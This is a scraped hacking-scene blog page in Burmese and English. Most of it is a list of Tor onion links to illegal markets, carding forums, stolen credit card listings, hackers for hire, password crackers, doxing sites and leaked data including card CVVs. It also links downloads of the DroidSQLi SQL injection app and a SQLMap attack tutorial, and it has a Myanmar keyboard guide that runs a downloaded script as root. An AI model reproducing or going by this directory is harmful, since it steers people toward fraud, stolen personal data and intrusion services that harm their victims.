http://zqhu3ynqqbqzsq2c.onion/ libreria/Hannah Arendt/ 
http:// c3jemx2ube5v5zpg.onion/? author=view&id=18&letter=B Orwell 
http://zqhu3ynqqbqzsq2c.onion/ libreria/ some philosophers 
http://xqz3u5drneuzhaeo.onion/ users...a=FreeBibliothecaAlexan drina Anony Share Uploads many books 
http://utovvyhaflle76gh.onion/ sTORage/Books/ books new world order not done yet 
http:// kpynyvym6xqi7wz2.onion/ files.html older files from the underground - pseudo anarchist bit kiddy 
http://crimethinc.com/books/ alternative anarchistic books and stuff posters and so 
http://am4wuhz3zifexz5u.onion/ but mostly very older books filesharing 
http://4eiruntyxxbgfv7o.onion/ imgzapr/ 
http://utovvyhaflle76gh.onion/ sTORage/ upload site 
http://4eiruntyxxbgfv7o.onion/ paste/ 
http://ocrlwkklxt3ud64u.onion/ tor upload 
http://p7d2k2xiioailnuu.onion/ image upload 
http://i7hknwg4up2jhdkx.onion/ uploader 
http://4eiruntyxxbgfv7o.onion/ anonyshares.html max 10mb 
http://4eiruntyxxbgfv7o.onion/ snapbbs/3232a619/ filesharing forum login 
http://dg6exbqq42btatnw.onion/ file sharing 
http://ldwvpjcrw5mmekvg.onion/ use some of the 100GB of usable FTP space on a server here 
http://f3ew3p7s6lbftqm5.onion/ onion filestore 
http://zw3crggtadila2sg.onion/ imageboard/ chan board very chan 
http://4eiruntyxxbgfv7o.onion/ snapbbs/7fbb7e1f/ paparazzi forum log in Illegal markets
http://silkroadvb5piz3r.onion/ silkroad/register the illegal market 
http://5onwnspjvuk7cwvk.onion/ blackmarket 
http://clsvtzwzdgzkjda7.onion/ active hacking forum and market place 
http://4eiruntyxxbgfv7o.onion/ ads selling stolen creditcards on 
http://clsvtzwzdgzkjda7.onion/ viewtopic.php?f=57&t=3631 IDstores on Tor 
http://xqz3u5drneuzhaeo.onion/ users/experiments/ warehouse3.html fake or not, medical experiments ? 
http://wkwjr7pn7xubtpx5.onion/ carding forum 
http://wihwaoykcdzabadd.onion/ carders planet just page with services 
http://4eiruntyxxbgfv7o.onion/ snapbbs/3e238502/ threadlist.php? carders list quite dead 
http://wdnqg3ehh3hvalpe.onion/ PS3 cracking list and root keys 
http://n2wrix623bp7vvdc.onion/ hackingservices.html just page with hack services 
http://4eiruntyxxbgfv7o.onion/ snapbbs/794b7d4/ cracked games sign up 
http://yj2nu2qygzpjcglm.onion/ one of the so-called hitman for hire hackers 
http://3terbsb5mmmdyhse.onion/ hashers that crack passwords 
http://lcvkso2t5t3cmy3x.onion/ hackcanada/index.html hack canada 
http://4eiruntyxxbgfv7o.onion/ snapbbs/d136fbb/threadlist.php? not very active hackerforum 
http://4eiruntyxxbgfv7o.onion/ snapbbs/4b5fce4e/ hackerforums but need to sign up 
http://u32gu6u4cf5zpkzw.onion/ hiring hackers 
http://ugh6gtz44ifx23e7.onion/ rent a hacker service (scam?) 
http://4eiruntyxxbgfv7o.onion/ snapbbs/19cc6d6e/ uscyberlabs securityforum login Documents, info and pastes 
http://4eiruntyxxbgfv7o.onion/ paste/browse.php pastes recent public 
http://6sgjmi53igmg7fm7.onion/ index.php?title=Main_Page buggedplanet.info copy 
http://f3ew3p7s6lbftqm5.onion/ stratfor_full_misc.txt stratfor full text with cvv 
http://zbnnr7qzaxlk5tms.onion/ wikileaks 2010 
http://utovvyhaflle76gh.onion/ sTORage/Wikileaks Archives/ collatoral damage 
http://npieqpvpjhrmdchg.onion/ doxviewer.php doxing like pastebin 
http://nwycvryrozllb42g.onion/ isp-spy/ all the ISP spy files for police interception 
http://nwycvryrozllb42g.onion/ PS3 jailbreak 
http://nwycvryrozllb42g.onion/ midasbank/ MIDAS bank of American leak 

Credits:Revelation (Team Openfire)

Enjoy lady :P 

Continue Reading

Droidsqli Android SQL injection Tool (Android)

Download :.: > http://www.mediafire.com/download/donjrst5fd0odbj/Droidsqli.apk <

 (password) : little

DroidSQLi supports the following injection techniques:

1. Time based injection
2. Blind injection
3. Error based injection
4. Normal injection

သူ အဲ့ေလာက္ရွင္းျပထားတာ က်ြန္ေတာ္ထက္ရွင္းဖို ့မလိုေတာ့ပါဘူး :P ဒါမဲ့ Notice ေလးဖတ္သြားဦး :D 

Notice: this application is for educational purposes ONLY. No warranties of any kind are expressed or implied. Use at your own risk! 

Continue Reading

Install Zawgyi-one keyboard font On Ubuntu 12.10

Ubuntu 12.10 မွာ Zawgyi သြင္းစရာမလိုဘဲ ျမန္မာလို ဖတ္လို ့ရပါတယ္ .. ဘာလို ့လဲ ဆိုေတာ့ Unicode က build in ပါျပီးသားပါ ။ သုိ ့ေပမဲ့ ျမန္မာလို Keyboard ရိုက္လို ့မရပါဘူး ။ ႏိုင္ငံျခား Forum တခုျဖစ္တဲ့ Ubuntu forum တခုမွာ Mg Nga Pyin ရွင္းျပထားတဲ့ Myanmar Font အေျကာင္းေလး တခုျပေပါ့မယ္ . . . 

How many kinds of Myanmmar fonts are there? 

Four as far as I know .

1.  Unicode
2.  Ayar - Unicode, but encoding is slightly modified
3.  Zawgyi - Non-Unicode
4.  ASCII - Winn Innwa

အဲဒီထဲမွာ Unicode က Build in ပါျပီးသားဆိုေတာ့ ျမန္မာ လို ေအးေဆးဖတ္လို ့ရပါတယ္ .. .. ဒါမဲ့ ျမန္မာလိုစာရို္က္မယ္ဆိုရင္ Zawgyi one ထည့္ထားဖို ့လိုပါတယ္ ။ တျခား Font လဲထည့္လို ့ရေပမဲ့ Zawgyi one ကေတာ့ ကိုယ္ Window တုန္းက လက္ကြက္နဲ ့ဆိုေတာ့ ပိုအဆင္ေျပတာေပါ့ .. .. :D 

လိုအပ္တဲ့ zawgyi-keyboard-ubuntu.tar.gz ကိုေအာက္မွာ ေဒါင္းလိုက္ပါ ။ 

http://www.mediafire.com/download/fhl2riridzacpx2/zawgyi-keyboard-ubuntu.tar.gz

Pass = little

Download ျပီးသြားရင္ေတာ့ Desktop ေပၚတင္ျပီး Terminal ဖြင့္လိုက္ပါ ။ ျပီးသြားရင္ sudo -s လို ့ရိုက္ထည့္ျပီး ကိုယ့္ Ubuntu မွာေပးထားတဲ့ Password ရိုက္ထည့္လိုက္ပါ ။ [#sudo ဆိုတာကေတာ့ Security ပိုင္းဆိုင္ရာအရ Admin Account ( Linux မွာ root account! လို႕ ေခၚပါတယ္ ) ကပဲ software ကို Install လုပ္ႏုိင္ဖို႕ လုပ္ထားတဲ့အတြက္ root account! က တဆင့္သြားမယ္လို႕ ဆိုထားတာပါ ဒါေၾကာင့္ Password ေတာင္းပါလိမ့္မယ္ ]

ဒါဆိုရင္ zawgyi-keyboard-ubuntu.tar.gz ကိုေျဖဖို ့အတြက္ cd Desktop လို ့ရိုက္ထည့္လိုက္ပါ ။ ျပီးသြားရင္ ေအာက္က Command အတိုင္းေျဖခ်ေပါ့မယ္ ။

tar xzf zawgyi-keyboard-ubuntu.tar.gz 

ဒါဆိုရင္ Zawgyi ဆိုတဲ့ Folder ေလးတခုေပၚလာပါလိမ့္မယ္ .. ဒါဆိုရင္ အဲ့ထဲကို ၀င္ဖို ့အတြက္ cd zawgyi လို ့ရိုက္ထည့္လိုက္ပါ။

ျပီးသြားရင္ sudo sh install.sh ရိုက္ထည့္ျပီး Install စလုပ္ေပါ့မယ္ .. .. 

1 လို ့ရိုက္ထည့္ေပးလိုက္ပါ . Install complete လို ့ေပၚလာျပီဆိုရင္ ကိစၥ ျပီးပါျပီ ။ Keyboard ဘဲ Change ေပးရံုဘဲရွိေတာ့တယ္ .

KeyBoard ခ်ိန္းဖို ့အတြက္ System Settings ထဲ၀င္လိုက္ပါ ။ 

ျပီးရင္ Keyboard Layout ကိုႏိုပ္လိုက္ပါ ။ 

Ok . ဒါဆိုရင္ ေအာက္ဆံုးက အေပါင္းပုံစံေလးကုိ နုိပ္လုိက္ျပီး Myanmar ကုိ ရိုက္ထည့္လိုက္ပါ။ 

ေပၚလာတာက Burmese အဟီးး :D Burmese ကို ေရြးေပးျပီးရင္ ေဘးနားက option ကုိ နုိပ္ပါ။ 

အဲ့မွာ Key(s) To Change Layout ဆိုတဲ့ tab ေလးကို ျဖည္ခ်လိုက္ျပီး Alt+Shift ဆိုတာေလး ေရြးေပးလိုက္ပါ ။ (ဒီသေဘာက font ေျပာင္းရင္ဘယ္ခလုတ္နဲ႔ေျပာင္းမလဲဆုိတာကုိေျပာတာပါ။ ၾကဳိက္တာေရြးလုိ႔ရပါတယ္။) ။ 

ဒါဆိုရင္  ျမန္မာ လိုေရးလို ့ရပါျပီ ။ ဟုတ္မဟုတ္ စမ္းေရးျကည့္ရေအာင္ ။ 

#Have Fun Lady :P

Continue Reading

SQLMap Tutorial By H1N1

က်ြန္ေတာ္တို ့ M.H.U က Bro H1N1 ေရးထားတဲ့ စာအုပ္ေလးပါ ။ SQLmap ျဖင့္ Attacking လုပ္တဲ့နည္းေလး အေျခခံက်က် ေရးေပးထားပါတယ္ ။ ။ ။ SQLMap အေျကာင္းကိုေလ့လာေနတဲ့ ညီကုိေတြအတြက္ အထူးအဆင္ေျပေလာက္တယ္ ။ ။

[+] Download From Mediafire [+]

http://www.mediafire.com/download/svd3yuu0dmez9ed/Sqlmap_Tutorial_By_H1N1.pdf

Continue Reading

:.:How to lock Folder with Password ?

How to lock Folder with Password ?

Folder ေတြကုိ Password ေပးျပီး ကာကြယ္ဖို႔ နည္းလမ္းေပါင္း အမ်ားၾကီးရွိပါတယ္ . တခ်ိဳ ့က Software သံုးျပီး ကာကြယ္က်ပါတယ္ ။ ဒါေပမယ့္ ကၽြန္ေတာ္ ဒီ Post မွာ Folder ေတြကုိ Software မသံုးပဲ Password ေပးျပီး ကာကြယ္နည္းပါ ။

• ပထမဦးဆံုး ကိုယ္ Password Lock ခ်မဲ့ Folder တစ္ခုထဲ ၀င္လိုက္ပါ ။ 
• ျပီးသြားရင္ ကိုယ့္ Folder ထဲမွာ Text file တစ္ခု Create လုပ္လိုက္ပါ (Right Click Context Menu ကေန လုပ္လုိ႔ရပါတယ္)

Continue Reading